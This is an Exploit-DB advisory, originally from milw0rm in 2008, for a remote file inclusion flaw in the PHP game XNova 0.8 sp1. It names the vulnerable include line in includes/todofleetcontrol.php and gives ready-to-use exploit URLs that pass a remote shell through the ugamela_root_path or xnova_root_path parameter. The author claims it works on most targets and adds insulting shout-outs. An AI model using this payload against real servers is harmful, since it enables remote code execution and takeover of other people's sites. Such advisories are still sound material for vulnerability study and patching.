XNova 0.8 sp1 - 'xnova_root_path' Remote File Inclusion

EDB-ID:

6254




Platform:

PHP

Date:

2008-08-17


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

##################################################################################################################################
Name: Xnova(Ogame) Remote File Inclusion
Author : NuclearHaxor
Contact MSN: nuclearhaxor@hotmail.com

homepage of xnova: http://xnova.fr/

Vuln file: includes/todofleetcontrol.php
Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -> but no declared ugamela_root_path ;)

Exploit(this exploit works in 90% targets):

------
target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?
or new version of xnova:
target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?
------

FUckZZz to Cybernet1c(2) aka ph4nt0mh4ck3r && Cr4wl aka Raz0r

##################################################################################################################################

# milw0rm.com [2008-08-17]